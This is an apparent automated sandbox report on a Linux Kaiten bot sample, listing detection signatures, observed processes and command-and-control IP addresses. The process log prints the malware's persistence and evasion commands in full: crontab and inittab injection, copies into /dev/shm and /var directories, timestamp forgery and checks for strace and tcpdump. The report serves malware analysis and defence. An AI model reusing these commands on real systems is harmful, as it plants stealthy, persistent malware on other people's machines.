Analysis Overview
SHA256
7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
Threat Level: Known bad
The file 582a434ba0f2e04bd8b5495c50320068 was found to be: Known bad.
Malicious Activity Summary
Identified Kaiten Bot
Kaiten family
Writes file to system bin folder
Modifies rc script
Writes file to user bin folder
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-14 02:35
Signatures
Identified Kaiten Bot
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Kaiten family
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-14 02:35
Reported
2022-03-14 02:37
Platform
ubuntu1804-amd64-en-20211208
Max time kernel
0s
Max time network
102s
Command Line
Signatures
Writes file to system bin folder
| Description | Indicator | Process | Target |
|---|---|---|---|
| /bin/crontab | /bin/crontab | N/A | N/A |
| /bin/nvram | /bin/nvram | N/A | N/A |
| /bin/uname | /bin/uname | N/A | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
|---|---|---|---|
| /etc/rc.local | /etc/rc.local | ./582a434ba0f2e04bd8b5495c50320068 | N/A |
Writes file to user bin folder
| Description | Indicator | Process | Target |
|---|---|---|---|
| /usr/bin/crontab | /usr/bin/crontab | N/A | N/A |
| /usr/sbin/nvram | /usr/sbin/nvram | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/.bawtz | /tmp/.bawtz | ./582a434ba0f2e04bd8b5495c50320068 | N/A |
Processes
./582a434ba0f2e04bd8b5495c50320068
[./582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c pidof -x strace > /dev/null]
/bin/pidof
[pidof -x strace]
/bin/sh
[sh -c pidof -x tcpdump > /dev/null]
/bin/pidof
[pidof -x tcpdump]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/sh
[sh -c crontab -r]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /tmp/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -r]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep /tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c echo "0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/bin/cat
[cat /etc/inittab2]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c /bin/uname -n]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/dev/shm/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep -v /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c echo "0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/bin/cat
[cat /etc/inittab2]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/var/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c echo "0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab2]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/var/lock/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /var/lock/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c echo "0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab2]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/var/run/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c echo "0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/usr/bin/crontab
[crontab -]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab2]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| NL | 67.209.115.148:8080 | | tcp |
| SG | 194.59.165.52:8080 | | tcp |
| SG | 37.44.244.106:8080 | | tcp |